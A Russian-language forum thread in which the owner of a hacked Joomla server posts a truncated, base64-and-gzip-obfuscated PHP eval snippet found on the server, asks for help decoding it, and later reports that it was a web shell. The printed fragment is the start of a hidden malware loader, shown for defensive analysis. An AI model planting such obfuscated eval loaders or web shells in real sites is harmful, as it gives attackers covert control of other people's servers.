Помогите расшифровать gzuncompress(base64_decode)

M
На сайте с 11.01.2006
Offline
153
11983

Здравствуйте. Недавно был взломан сервер с Joomla, проверка нашла 2 файла php, с практически идентичным содержанием. Моих знаний не хватает для расшифровки данного кода :(

Если кто-то поможет с расшифровкой данного файла - буду очень благодарен!

<?php

eval(gzuncompress(base64_decode('eJzlvWt7GjcTMPzZ+RXKlrsLDcaAkzQ1hhwcO3Ga2KkPOToPXWCBrReW7i7GTur//syMDivtAeOk9/281/U6V2yQRqORNBqNRqNRyZnH4+7MiaK2tTkYPujfbzibD+8/atQfDZq/Dh416w3X2fz10bD5oGe17pT6gR+ErM2snwZOAxMG7tCZ+3HX6cdeMIUce8/z3eiNM7W1
?>
edogs software
На сайте с 15.12.2005
Offline
775
#1

Код у Вас обрезанный - поэтому не запускается.

Но, eval (gzun... замените на echo gzun... запустите и увидите код в "html источнике".

С другой стороны - не по фиг ли что код, если он "злой" и "левый", то можно удалять без вопросов.

Разработка крупных и средних проектов. Можно с криптой. Разумные цены. Хорошее качество. Адекватный подход. Продаем lenovo legion в спб, дешевле магазинов, новые, запечатанные. Есть разные. skype: edogssoft
G
На сайте с 16.07.2012
Offline
2
#2

попробуй с этим поиграться http://www.artlebedev.ru/tools/decoder/

R
На сайте с 24.01.2008
Offline
180
#3

Под этим кодом с большой вероятностью скрывается вредоносный код!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
fa2m
На сайте с 07.09.2011
Offline
23
#4
Rxp:
Под этим кодом с большой вероятностью скрывается вредоносный код!

капитан-очевидность 😂

---------- Добавлено 11.08.2012 в 09:35 ----------

Magistr, дайте, пожалуйста, весь код, если вы его, конечно, ещё не удалили

Встречи в Днепре /ru/forum/736064 (/ru/forum/736064) Беклинк за копейку. Удобный сервис анализа обратных ссылок. (http://backlink.page-weight.ru/)
M
На сайте с 11.01.2006
Offline
153
#5

Спасибо всем за помощь, второй файл оказался не битый, его удалось расшифровать полностью, это был шелл.

Сейчас осталось определить, как он попал в данную папку, и попытаться закрыть уязвимость.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий